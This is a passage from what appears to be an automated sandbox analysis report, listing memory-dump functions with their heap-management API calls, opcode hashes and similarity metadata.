                                                                  • Part of subcall function 01035710: RtlAllocateHeap.NTDLL(00000000,010227CC,00000000,?,01024253,00000002,00000000,010A4A32,?,?,01097AEE,010227CC,00000004,00000000,00000000,00000000), ref: 01035742
                                                                • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,0103A3D6,?,00000004,00000004,?,00000000,?,01031644,?,00000004), ref: 010356E9
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AllocateHeap$_free
                                                                • String ID:
                                                                • API String ID: 1482568997-0
                                                                • Opcode ID: a86c44ccbb26b453eb48709e4e4d7dba710edc142a3ede5f213a7c6273ada3f7
                                                                • Instruction ID: 19c588c9e977530ea3b1eeead7839be33085f881755d61941598c5286b2adc82
                                                                • Opcode Fuzzy Hash: a86c44ccbb26b453eb48709e4e4d7dba710edc142a3ede5f213a7c6273ada3f7
                                                                • Instruction Fuzzy Hash: 1AF02131501612BADB712A2AFC00F9F3BAC9FE5671B140059FDD4D71F0DB30C400A5A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 010316E6, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 66d8ee957bfad907b0fc372855a794ecf980815f6539e751f18207387ac73c51
                                                                • Instruction ID: 44c4dda35e8a86a0c471c472f148697ee917ef379e4957f1f5678b9d48adf722
                                                                • Opcode Fuzzy Hash: 66d8ee957bfad907b0fc372855a794ecf980815f6539e751f18207387ac73c51
                                                                • Instruction Fuzzy Hash: 0A313A76A006149F8B15CF5DC48489DBBF5FFCD32072986A5E669EB360D330AD019B91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0103A569, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 01033EB5: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01034408,00000001,00000364,00000003,000000FF,?,01024253,00000002,00000000,010A4A32), ref: 01033EF6
                                                                • _free.LIBCMT ref: 0103A5D8
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AllocateHeap_free
                                                                • String ID:
                                                                • API String ID: 614378929-0
                                                                • Opcode ID: 4b1b48d91a131ce7ecfe0161ac3101a294dc7d12da31d532177fce5abc178839
                                                                • Instruction ID: 5ad8af1b6e287d1782659b2654b834a02662694d477fa5e35587bf3d8d677a6a
                                                                • Opcode Fuzzy Hash: 4b1b48d91a131ce7ecfe0161ac3101a294dc7d12da31d532177fce5abc178839
                                                                • Instruction Fuzzy Hash: C801D672A04316ABC3218F58D88499EFBDCFB45370F15066DE9D5E76C0D7706910CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01045000, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3d8e2d5905d4991f3e4aff7adec2abb92bb0a8e1297d698dd54e4ca93c343161
                                                                • Instruction ID: c667ec2335b09e9c722c21b903684157d9ef577ff281a243d22eef9f3a526352
                                                                • Opcode Fuzzy Hash: 3d8e2d5905d4991f3e4aff7adec2abb92bb0a8e1297d698dd54e4ca93c343161
                                                                • Instruction Fuzzy Hash: 92F0E9A900D3C31FE7A323BC5C942A97FA48E43164B1401E7F5D185093D907140243B3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01035710, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,010227CC,00000000,?,01024253,00000002,00000000,010A4A32,?,?,01097AEE,010227CC,00000004,00000000,00000000,00000000), ref: 01035742
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: f5c533a593658f604dd68bfab186b6502bf448921fea8fee2fcc79acfd33971e
                                                                • Instruction ID: 80c9cfacb3d21eb2b04d1d6237b9f16679661455a72a115b8fd7d6c34afff8f4
                                                                • Opcode Fuzzy Hash: f5c533a593658f604dd68bfab186b6502bf448921fea8fee2fcc79acfd33971e
                                                                • Instruction Fuzzy Hash: 25E06535111626D6EA632A6AFC04B9E7A9CBBC16B0F050561EDD5961E0DB24D80186E2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 010282A8, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 010282BB
                                                                  • Part of subcall function 01033F12: RtlFreeHeap.NTDLL(00000000,00000000,?,0103AF4B,?,00000000,?,00000002,?,0103B1F0,?,00000007,?,?,0103B865,?), ref: 01033F28
                                                                  • Part of subcall function 01033F12: GetLastError.KERNEL32(?,?,0103AF4B,?,00000000,?,00000002,?,0103B1F0,?,00000007,?,?,0103B865,?,?), ref: 01033F3A
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ErrorFreeHeapLast_free
                                                                • String ID:
                                                                • API String ID: 1353095263-0
                                                                • Opcode ID: 4fa6bf60a0e12c7425d921ae826977d40f95b724c2506598cc2b87a6e92e61d7
                                                                • Instruction ID: 853302cdb883c4cfa69eab6bd540ba12cc5c3945ed7892f2425c0fd22ce17883
                                                                • Opcode Fuzzy Hash: 4fa6bf60a0e12c7425d921ae826977d40f95b724c2506598cc2b87a6e92e61d7
                                                                • Instruction Fuzzy Hash: F2C0803140410CFBCB00DF85E905A5D7B7CD780320F104184FC4C07200DA729E1055C0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 010AE828, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindCloseChangeNotification.KERNELBASE(?,?,010AE820,00000000,00000000,?,00000000), ref: 010AE82E
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ChangeCloseFindNotification
                                                                • String ID:
                                                                • API String ID: 2591292051-0
                                                                • Opcode ID: b999f164dd70ad88dc5f16a9d82b772676eb058187340cdceb0958c6c8ad111b
                                                                • Instruction ID: fb5eced957b7757e4fe700c3ee29d5c35eff4bf4b5cc0ea84ad2a1a722cfac1c
                                                                • Opcode Fuzzy Hash: b999f164dd70ad88dc5f16a9d82b772676eb058187340cdceb0958c6c8ad111b
                                                                • Instruction Fuzzy Hash: D5A0113008020CFB8E002A82E808888BF2CEA002A0B828020F88C80022CB33A8208AA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions